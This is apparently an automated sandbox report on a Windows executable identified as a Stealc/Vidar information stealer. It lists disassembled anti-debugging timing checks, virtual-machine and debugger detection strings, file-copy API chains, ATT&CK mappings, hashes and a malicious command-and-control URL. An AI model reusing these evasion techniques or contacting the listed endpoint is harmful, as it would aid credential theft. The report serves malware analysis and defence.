Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CEF40 second address: 14CEF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF285 second address: 14CF289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF289 second address: 14CF28D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF28D second address: 14CF293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF293 second address: 14CF2E5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F11F8F18C2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b js 00007F11F8F18C2Ch 0x00000011 xor edx, 266FEDD6h 0x00000017 push 00000004h 0x00000019 mov dl, 18h 0x0000001b mov dx, si 0x0000001e call 00007F11F8F18C29h 0x00000023 pushad 0x00000024 jno 00007F11F8F18C2Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F11F8F18C36h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF2E5 second address: 14CF30F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F11F8D51849h 0x0000000e jmp 00007F11F8D51843h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF30F second address: 14CF31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F11F8F18C26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF31A second address: 14CF349 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11F8D5183Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F11F8D51844h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF349 second address: 14CF34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF34D second address: 14CF351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF351 second address: 14CF35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F11F8F18C26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CF618 second address: 14CF61D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D1FBE second address: 14D1FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D1FC4 second address: 14D1FDC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jnc 00007F11F8D51836h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D1FDC second address: 14D1FE6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D1FE6 second address: 14D1FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D3E06 second address: 14D3E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8F18C32h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D3E2E second address: 14D3E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F11F8D51836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D0257 second address: 54D027E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F11F8F18C39h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D027E second address: 54D029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51841h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D029A second address: 54D029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D029E second address: 54D02A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D0341 second address: 54D035E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D035E second address: 54D0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D0365 second address: 54D037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11F8F18C2Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D037E second address: 54D03AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51849h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8D5183Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D03AB second address: 54D03B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D03B1 second address: 54D03B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54D03B5 second address: 54D03EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F11F8F18C36h 0x00000012 pop ebp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, 11h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12419BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1241A0C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13ED4B4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13ED831 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13EBF55 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13FDBFB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 14734BD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00FF38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FF4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00FEDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00FEE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00FF4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00FEED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FE16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FEF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00FF3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEF68A FindFirstFileA, 0_2_00FEF68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00FEBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00FEDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE1160 GetSystemInfo,ExitProcess, 0_2_00FE1160
Source: file.exe, file.exe, 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2081293607.0000000001831000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081293607.0000000001862000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2081293607.0000000001862000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
Source: file.exe, 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13698
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13643
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13646
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13663
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13658
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00FE45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00FF9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9750 mov eax, dword ptr fs:[00000030h] 0_2_00FF9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00FF78E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00FF9600
Source: file.exe, file.exe, 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 4Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00FF7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00FF7980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00FF7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00FF7A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2039233815.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2039233815.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Antivirus detection for the submitted sample:
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML | 
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Antivirus detection for contacted URLs:
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
                Contacted URLs:
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                URLs found in process memory (the string is listed exactly as it was found in memory, trailing characters included):
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.php1 | file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpQ | file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37Tz | file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/H | file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpe | file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpc | file.exe, 00000000.00000002.2081293607.0000000001862000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/t1 | file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpy | file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php8 | file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                Contacted IPs:
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1523618
                                  Start date and time:2024-10-01 20:54:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 2m 45s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 18
                                  • Number of non-executed functions: 83
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • VT rate limit hit for: file.exe
                                  No simulations
                Context for IP 185.215.113.37 (other Joe Sandbox analyses that contacted the same IP):
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                                  No context
                Context for ASN WHOLESALECONNECTIONSNL (other Joe Sandbox analyses that contacted the same ASN):
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.950960970175894
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'844'736 bytes
                                  MD5:ed976a68fbf288f214e53f8ee4734fcc
                                  SHA1:a67a4f8e2e21d8d8721a7eafdb2a13655854e4f1
                                  SHA256:538f1b2469163b43d505e8d7f15b9618fc25834aa3b2ebe3f452b120120250cd
                                  SHA512:163b230505d67ff3f5dae64321591ae143819387475274377e30f6bfdc710d18ebbac3eb14ccc9108c23c662d858769d9eff01f8274fab3af6d44ecc93b2677c
                                  SSDEEP:49152:EMoTEGtgeGzFVokLvwzDdYdvopaLjDX48Yaop2Cy:joTHgeGzFSkzwzDdAom62/
                                  TLSH:FC8533C9C7202CC8C45E1E3BE569590E6564B734F8D874921D678EBC484FA2DB6E9CF0
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xa9b000
                                  Entrypoint Section:.taggant
